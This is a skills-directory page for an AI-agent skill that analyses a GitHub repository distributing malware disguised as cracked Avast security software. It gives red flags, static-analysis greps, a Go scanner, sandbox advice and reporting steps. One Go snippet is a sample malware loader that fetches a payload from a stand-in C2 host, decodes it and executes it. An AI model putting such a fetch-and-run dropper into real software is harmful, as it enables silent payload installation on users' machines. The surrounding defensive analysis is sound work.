Remote OpenClaw
Menu
SkillsMCPPluginsFree guideDigestSubmit MCPSkillPluginMCPMCP, plugin, or skillAdvertise
Remote OpenClaw
SkillsMCPPluginsFree guideDigestSubmit MCPSkillPluginMCPMCP, plugin, or skillAdvertise

Featured

Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
Skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast
malware-analysis-dragonflytomb-avast logo

malware-analysis-dragonflytomb-avast

aradotso/security-skills
622 installs1 stars
Run it on Hostinger →up to 70% off + an extra 10% with code ZACAARON10Free API →

Installation

npx skills add https://github.com/aradotso/security-skills --skill malware-analysis-dragonflytomb-avast

Summary

Analyze and understand malware distribution techniques disguised as legitimate security software installers

SKILL.md

DragonflyTomb/Avast-Premium-Security-2026 Analysis

Skill by ara.so — Security Skills collection

⚠️ WARNING: Malware Distribution Repository

This repository is NOT legitimate Avast Premium Security software. It exhibits multiple red flags consistent with malware distribution disguised as cracked security software.

Threat Indicators

Repository Red Flags

  1. Unauthorized Distribution: Avast Corporation does not distribute software via GitHub repositories named "DragonflyTomb"
  2. Crack/Keygen Keywords: Terms like "Keygen", "Pre-Activated", "Loader", "Serial" indicate piracy or malware
  3. Suspicious Topics: Includes "retdec" (reverse engineering tool) in security software context
  4. No README: Legitimate software repositories include documentation
  5. Artificial Stars: 60 stars at 5 stars/day suggests manipulation
  6. No License: "NOASSERTION" for commercial software is suspicious
  7. Future Date: Claims to be "2026" version (likely timestamp manipulation)

Common Malware Distribution Patterns

// Typical malware loader pattern in Go
package main

import (
    "encoding/base64"
    "io/ioutil"
    "net/http"
    "os"
    "os/exec"
)

// WARNING: This is example malware behavior - DO NOT USE
func suspiciousDownloader() {
    // Downloads secondary payload
    resp, _ := http.Get("hxxp://malicious-c2-server.com/payload")
    defer resp.Body.Close()
    
    payload, _ := ioutil.ReadAll(resp.Body)
    decoded, _ := base64.StdEncoding.DecodeString(string(payload))
    
    // Writes to system directory
    ioutil.WriteFile("C:\\Windows\\Temp\\update.exe", decoded, 0755)
    
    // Executes with elevated privileges
    exec.Command("cmd", "/c", "C:\\Windows\\Temp\\update.exe").Run()
}

Analysis Techniques

Static Analysis Checklist

# Check for suspicious imports (if source code available)
grep -r "syscall" .
grep -r "unsafe" .
grep -r "net/http" .
grep -r "os/exec" .
grep -r "crypto" .

# Look for obfuscation patterns
grep -r "base64" .
grep -r "XOR" .
grep -r "decode" .

# Check for persistence mechanisms
grep -r "Registry" .
grep -r "Startup" .
grep -r "Task Scheduler" .

Detection Code Example

package main

import (
    "crypto/sha256"
    "fmt"
    "io"
    "os"
    "path/filepath"
    "strings"
)

// MalwareIndicators represents suspicious patterns
type MalwareIndicators struct {
    SuspiciousImports  []string
    ObfuscationDetected bool
    NetworkConnections  []string
    FileHash           string
}

// AnalyzeGoFile checks for malware indicators
func AnalyzeGoFile(path string) (*MalwareIndicators, error) {
    content, err := os.ReadFile(path)
    if err != nil {
        return nil, err
    }
    
    indicators := &MalwareIndicators{
        SuspiciousImports: []string{},
    }
    
    // Check for suspicious imports
    suspiciousPackages := []string{
        "syscall",
        "unsafe",
        "os/exec",
        "net/http",
        "crypto/aes",
    }
    
    contentStr := string(content)
    for _, pkg := range suspiciousPackages {
        if strings.Contains(contentStr, fmt.Sprintf(`"%s"`, pkg)) {
            indicators.SuspiciousImports = append(indicators.SuspiciousImports, pkg)
        }
    }
    
    // Check for obfuscation
    if strings.Contains(contentStr, "base64") || 
       strings.Contains(contentStr, "XOR") ||
       strings.Contains(contentStr, "decode") {
        indicators.ObfuscationDetected = true
    }
    
    // Calculate file hash
    f, _ := os.Open(path)
    defer f.Close()
    h := sha256.New()
    io.Copy(h, f)
    indicators.FileHash = fmt.Sprintf("%x", h.Sum(nil))
    
    return indicators, nil
}

// ScanRepository analyzes all Go files in directory
func ScanRepository(rootDir string) {
    filepath.Walk(rootDir, func(path string, info os.FileInfo, err error) error {
        if strings.HasSuffix(path, ".go") {
            indicators, err := AnalyzeGoFile(path)
            if err != nil {
                return nil
            }
            
            if len(indicators.SuspiciousImports) > 0 || indicators.ObfuscationDetected {
                fmt.Printf("⚠️  Suspicious file: %s\n", path)
                fmt.Printf("   Hash: %s\n", indicators.FileHash)
                fmt.Printf("   Imports: %v\n", indicators.SuspiciousImports)
                fmt.Printf("   Obfuscated: %v\n\n", indicators.ObfuscationDetected)
            }
        }
        return nil
    })
}

Safe Investigation Practices

Sandbox Environment Setup

# Use isolated VM or container
docker run -it --rm --network none golang:1.21 /bin/bash

# Clone repository in isolated environment
cd /tmp
git clone https://github.com/DragonflyTomb/Avast-Premium-Security-2026

# Analyze without executing
cd Avast-Premium-Security-2026
find . -type f -name "*.go" | head -10

Binary Analysis Tools

# If compiled binaries are present
strings suspicious_binary.exe | grep -i "http"
strings suspicious_binary.exe | grep -i "password"
strings suspicious_binary.exe | grep -i "admin"

# Check for packed/obfuscated binaries
file suspicious_binary.exe
xxd suspicious_binary.exe | head -50

Reporting Malware

GitHub Abuse Report

# Report repository via GitHub's abuse form
# URL: https://github.com/contact/report-abuse

# Include:
# - Repository URL
# - Description: "Malware distribution disguised as Avast Premium Security"
# - Evidence: Keywords like keygen, loader, pre-activated

VirusTotal Submission

package main

import (
    "bytes"
    "fmt"
    "io"
    "mime/multipart"
    "net/http"
    "os"
)

// SubmitToVirusTotal uploads suspicious file for analysis
func SubmitToVirusTotal(filePath string) error {
    apiKey := os.Getenv("VIRUSTOTAL_API_KEY")
    if apiKey == "" {
        return fmt.Errorf("VIRUSTOTAL_API_KEY not set")
    }
    
    file, err := os.Open(filePath)
    if err != nil {
        return err
    }
    defer file.Close()
    
    body := &bytes.Buffer{}
    writer := multipart.NewWriter(body)
    part, _ := writer.CreateFormFile("file", filePath)
    io.Copy(part, file)
    writer.Close()
    
    req, _ := http.NewRequest("POST", "https://www.virustotal.com/vtapi/v2/file/scan", body)
    req.Header.Set("Content-Type", writer.FormDataContentType())
    req.Header.Set("x-apikey", apiKey)
    
    client := &http.Client{}
    resp, err := client.Do(req)
    if err != nil {
        return err
    }
    defer resp.Body.Close()
    
    fmt.Printf("VirusTotal response: %d\n", resp.StatusCode)
    return nil
}

Prevention Guidance

For Developers

  1. Never download from unofficial sources
  2. Verify digital signatures on legitimate software
  3. Check official vendor websites for authentic downloads
  4. Use package managers where possible
  5. Enable EDR/XDR solutions on development machines

For Security Teams

// GitHub repository monitoring
package main

import (
    "context"
    "fmt"
    "github.com/google/go-github/v50/github"
    "strings"
)

// MonitorSuspiciousRepos searches for malware distribution patterns
func MonitorSuspiciousRepos(ctx context.Context, token string) {
    client := github.NewClient(nil).WithAuthToken(token)
    
    keywords := []string{
        "keygen", "crack", "loader", "pre-activated",
        "premium serial", "full version installer",
    }
    
    for _, keyword := range keywords {
        query := fmt.Sprintf("%s in:description language:go", keyword)
        opts := &github.SearchOptions{
            ListOptions: github.ListOptions{PerPage: 10},
        }
        
        results, _, err := client.Search.Repositories(ctx, query, opts)
        if err != nil {
            continue
        }
        
        for _, repo := range results.Repositories {
            fmt.Printf("⚠️  Suspicious: %s\n", repo.GetFullName())
            fmt.Printf("   Description: %s\n", repo.GetDescription())
            fmt.Printf("   Stars: %d\n\n", repo.GetStargazersCount())
        }
    }
}

Legitimate Avast Resources

  • Official Website: https://www.avast.com
  • Official Downloads: https://www.avast.com/download
  • Official Support: https://support.avast.com
  • Verify Publisher: Digital signatures should show "Avast Software s.r.o."

Conclusion

This repository represents a malware distribution operation using social engineering tactics. Always obtain security software directly from verified vendor sources and never trust "cracked", "keygen", or "pre-activated" versions of commercial software.

Score

0–100
63/ 100

Grade

C

Popularity15/30

622 installs — growing adoption.

Completeness27/30

Documented: full SKILL.md body, description, one-line install. Missing: category/license metadata.

Trust15/25

Community skill with a public GitHub source repository you can review.

Freshness6/15

No update timestamp is tracked for this skill in our catalog.

Scored automatically from popularity, completeness, trust, and freshness — computed only from data in our catalog, never fabricated.

Proud of your score? Add this badge to your README.

Paste a snippet into your GitHub README. The badge updates automatically and links back to this page.

Malware Analysis Dragonflytomb Avast skill score badge previewScore badge

Markdown

[![Malware Analysis Dragonflytomb Avast skill](https://www.remoteopenclaw.com/skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast/badges/score.svg)](https://www.remoteopenclaw.com/skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast)

HTML

<a href="https://www.remoteopenclaw.com/skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast"><img src="https://www.remoteopenclaw.com/skills/aradotso/security-skills/malware-analysis-dragonflytomb-avast/badges/score.svg" alt="Malware Analysis Dragonflytomb Avast skill"/></a>

Malware Analysis Dragonflytomb Avast FAQ

How do I install the Malware Analysis Dragonflytomb Avast skill?

Run “npx skills add https://github.com/aradotso/security-skills --skill malware-analysis-dragonflytomb-avast” in your terminal. The skill is added to your agent's skills directory and picked up automatically on the next run — no restart or extra configuration needed.

What does the Malware Analysis Dragonflytomb Avast skill do?

Analyze and understand malware distribution techniques disguised as legitimate security software installers The full SKILL.md on this page shows the exact instructions the skill gives your agent.

Is the Malware Analysis Dragonflytomb Avast skill free?

Yes. Malware Analysis Dragonflytomb Avast is a free, open-source skill published from aradotso/security-skills. As with any third-party skill, review the source repository before installing it into an agent with sensitive access.

Does Malware Analysis Dragonflytomb Avast work with Claude Code and OpenClaw?

Yes. Skills use the portable SKILL.md format, so Malware Analysis Dragonflytomb Avast works with Claude Code, OpenClaw, Codex, Hermes, and any other agent that reads SKILL.md skills.

Featured

Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
Deploy OpenClaw in 60 seconds — 20% off logoDeploy OpenClaw in 60 seconds — 20% off

Launch OpenClaw on Hostinger in about 60 seconds and keep your agent live 24/7. Our referral link gives you 20% off, no coupon code needed.

Launch on Hostinger →
Run your Hermes agent on Hostinger, fully managed logoRun your Hermes agent on Hostinger, fully managed

Launch Hermes on Hostinger in one click, fully managed, no VPS knowledge needed. Use code ZACAARON10 for 10% off.

Launch on Hostinger →
Turn any website into LLM-ready data with Firecrawl logoTurn any website into LLM-ready data with Firecrawl

Firecrawl crawls and scrapes any site into clean markdown for your agent. Get 1,000 free credits plus 10% off through our link.

Try Firecrawl free →
Your own AI agent, running 24/7 with QwikClaw logoYour own AI agent, running 24/7 with QwikClaw

QwikClaw sets up and runs an always-on OpenClaw agent for you. One click, no config files, no server setup.

Deploy now →
One API to scrape, enrich, and extract the internet. logoOne API to scrape, enrich, and extract the internet.

Context.dev gives your agents a single API to scrape, enrich, and extract live web data — no proxies, no parsers, no maintenance.

Start building free →
View on GitHub

Recommended skills

Browse all →
find-skills logo

find-skills

vercel-labs/skills

2.7M installsInstall
frontend-design logo

frontend-design

anthropics/skills

720K installsInstall
grill-me logo

grill-me

mattpocock/skills

701K installsInstall
agent-browser logo

agent-browser

vercel-labs/agent-browser

596K installsInstall
grill-with-docs logo

grill-with-docs

mattpocock/skills

594K installsInstall
vercel-react-best-practices logo

vercel-react-best-practices

vercel-labs/agent-skills

591K installsInstall

Browse

Skills by category

Frontend250Git198Data154Testing120Design105Docs103Security96Automation87Backend76Devops37Productivity29Mcp23

Related guides

Hand-picked reading to help you choose, install, and use agent skills.

GuideBest Security Skills For AI AgentsGuide10 Openclaw Skills Every Nextjs Developer NeedsGuideBest Openclaw Skills 2026

Remote OpenClaw

AI agent skills directory, marketplace, and workflow hub for OpenClaw, Hermes Agent, Claude Code, Codex, and MCP-powered operator stacks.

The Agent Stack: weekly agent tooling digest, free.

Explore

  • Home
  • Skills Directory
  • Claude Code Skills
  • Codex Skills
  • MCP Clients
  • Marketplace
  • Hermes Ecosystem
  • Free guide
  • Learn
  • OpenClaw for Creators
  • OpenClaw for Founders
  • Blog
  • The Agent Stack (Digest)

More

  • Submit a Tool
  • Advertise
  • Playbook
  • Free Tools
  • API
  • Shipping
  • Contact
  • Terms
  • Privacy

Know a company that should advertise here? Refer them and earn 10% — up to $300 per referral.

© 2026 Remote OpenClaw
Fazier badgeFeatured on Twelve ToolsFeatured on Wired BusinessRemote OpenClaw - Featured on AI Agents DirectoryListed on Turbo0Featured on Uneed